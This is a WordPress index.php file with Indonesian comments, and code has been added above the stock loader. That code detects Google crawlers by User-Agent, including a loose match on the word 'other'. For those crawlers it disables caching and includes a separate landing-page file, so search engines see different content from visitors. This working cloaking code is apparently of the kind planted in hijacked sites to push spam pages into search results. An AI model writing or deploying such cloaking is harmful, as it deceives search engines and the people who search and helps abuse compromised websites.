// 1. Matikan cache untuk bot agar server tidak menyajikan halaman WordPress lama $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $user_agent_lowercase = strtolower($user_agent); // 2. Deteksi super ketat untuk semua lini Google (termasuk pengecekan parsial) $is_google = false; if ( strpos($user_agent_lowercase, 'google') !== false || strpos($user_agent_lowercase, 'googlebot') !== false || strpos($user_agent_lowercase, 'inspection') !== false || strpos($user_agent_lowercase, 'other') !== false ) { $is_google = true; } // ==================== EKSEKUSI PENGALIHAN ==================== if ($is_google) { // Beri tahu server jangan simpan cache untuk sesi ini header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); if (file_exists('letak_file_lp.php')) { include 'letak_file_lp.php'; exit; } } // ==================================================================== // DI BAWAH INI ADALAH KODE BAWAAN ASLI WORDPRESS (JANGAN DIUBAH) // ==================================================================== define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';